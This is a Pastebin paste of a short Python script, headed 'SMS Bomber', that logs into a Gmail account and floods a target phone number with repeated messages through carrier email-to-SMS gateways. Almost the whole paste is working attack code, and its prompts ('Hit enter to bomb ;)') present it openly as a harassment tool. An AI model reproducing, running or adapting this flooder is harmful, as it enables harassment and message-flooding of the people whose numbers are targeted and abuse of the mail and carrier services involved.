Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################
- # SMS Bomber - KrypTiK #
- ########################
- # www.p0wersurge.com #
- ########################
- import smtplib
- mailserver = smtplib.SMTP('smtp.gmail.com')
- mailserver.ehlo()
- mailserver.starttls()
- mailserver.ehlo()
- message = raw_input("Body: ")
- amount = int(raw_input("Amount: "))
- user = raw_input("Gmail User: ")
- passwd = raw_input("Gmail Pass: ")
- num = raw_input("Number: ")
- carrier = raw_input("Carrier (att,sprint,verizon,tmobile,virginmobile,alltell): ")
- other = raw_input("Other Carrier (@carrier): ")
- mailserver.login(user,passwd)
- if carrier == "sprint":
- to = num + '@messaging.sprintpcs.com'
- elif carrier == "att":
- to = num + '@text.att.net'
- elif carrier == "verizon":
- to = num + '@vtext.com'
- elif carrier == "tmobile":
- to = num + '@tmomail.net'
- elif carrier == "virginmobile":
- to = num + '@vmobl.com'
- elif carrier == "alltell":
- to = num + '@message.alltel.com'
- else:
- to = num + other
- i = raw_input("Hit enter to bomb ;)")
- for i in range(0,amount):
- mailserver.sendmail(user, to, message)
- print("Bombed ;)")
- mailserver.close()
- stopapp = raw_input("Bomb finished :)")
Advertisement
Add Comment
Please, Sign In to add comment